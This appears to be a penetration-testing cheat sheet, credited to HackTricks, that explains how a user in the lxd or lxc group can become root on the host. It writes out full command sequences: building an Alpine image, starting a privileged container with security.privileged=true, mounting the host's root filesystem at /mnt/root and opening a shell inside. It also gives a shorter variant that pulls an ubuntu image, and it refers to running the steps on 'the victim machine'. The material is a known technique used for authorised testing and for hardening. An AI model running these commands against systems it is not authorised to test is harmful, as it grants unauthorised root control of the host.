- Credits to HackTricks, https://reboare.github.io/lxd/lxd-escape.html && https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/
If you belong to lxd or lxc group, you can become root
Exploiting without internet
Method 1
You can install in your machine this distro builder: https://github.com/lxc/distrobuilder (follow the instructions of the github):
Upload the files lxd.tar.xz and rootfs.squashfs, add the image to the repo and create a container:
If you find this error Error: No storage pool found. Please create a new storage pool Run **lxd init**
and repeat the previous chunk of commands
Finally you can execute the container and get root:
Method 2
Build an Alpine image and start it using the flag security.privileged=true
, forcing the container to interact as root with the host filesystem.
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
# before running the image, start and configure the lxd storage pool as default
lxd init
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
Alternatively https://github.com/initstring/lxd_root
With internet
You can follow these instructions.
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted